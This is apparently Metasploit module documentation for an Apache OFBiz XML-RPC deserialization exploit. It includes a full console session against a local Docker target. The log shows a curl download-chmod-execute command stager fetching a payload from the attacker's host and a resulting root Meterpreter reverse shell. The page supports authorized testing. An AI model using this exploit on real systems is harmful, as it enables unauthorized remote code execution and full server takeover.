adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f151c511bc18de83a337cb44f1b0dd2f4522ee85
metasploit-gs/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md
T
William Vu d3febe3284 Set SSL as a DefaultOption and update RPORT
2020-08-14 21:46:34 -05:00

4.5 KiB
Raw Blame History

Vulnerable Application

Description

This module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for versions prior to 17.12.04.

Setup

You can use https://hub.docker.com/r/opensourceknight/ofbiz.

Verification Steps

Follow Setup and Scenarios.

Targets

0

This executes a Unix command.

1

This uses a Linux dropper to execute code.

Scenarios

Apache OFBiz from Docker.

msf6 > use exploit/linux/http/apache_ofbiz_deserialiation
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > options

Module options (exploit/linux/http/apache_ofbiz_deserialiation):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set srvport 8888
srvport => 8888
msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run

[*] Started HTTPS reverse handler on https://192.168.1.7:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
[*] Using URL: http://0.0.0.0:8888/68JL1QQv9
[*] Local IP: http://10.3.227.250:8888/68JL1QQv9
[*] Generated command stager: ["curl -so /tmp/hPNJksUw http://192.168.1.7:8888/68JL1QQv9", "chmod +x /tmp/hPNJksUw", "/tmp/hPNJksUw", "rm -f /tmp/hPNJksUw"]
[*] Executing command: curl -so /tmp/hPNJksUw http://192.168.1.7:8888/68JL1QQv9
[*] Client 192.168.1.7 (curl/7.38.0) requested /68JL1QQv9
[*] Sending payload to 192.168.1.7 (curl/7.38.0)
[+] Successfully executed command: curl -so /tmp/hPNJksUw http://192.168.1.7:8888/68JL1QQv9
[*] Command Stager progress -  50.91% done (56/110 bytes)
[*] Executing command: chmod +x /tmp/hPNJksUw
[+] Successfully executed command: chmod +x /tmp/hPNJksUw
[*] Command Stager progress -  70.91% done (78/110 bytes)
[*] Executing command: /tmp/hPNJksUw
[+] Successfully executed command: /tmp/hPNJksUw
[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: frnipk1q) Redirecting stageless connection from /aJ9UMsgiAwtcxlrEA_FZgALC4Hv1lB7J6FYYuxOIHgIqCwYB7mObrp856SohhGkVPq with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: frnipk1q) Redirecting stageless connection from /aJ9UMsgiAwtcxlrEA_FZgAbFBH7l4OT-5iFaTB63j with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: frnipk1q) Attaching orphaned/stageless session...
[*] Command Stager progress -  82.73% done (91/110 bytes)
[*] Executing command: rm -f /tmp/hPNJksUw
[+] Successfully executed command: rm -f /tmp/hPNJksUw
[*] Meterpreter session 1 opened (192.168.1.7:8443 -> 192.168.1.7:55439) at 2020-08-14 16:42:30 -0500
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root @ 298e7fba3ec9 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 8.4 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink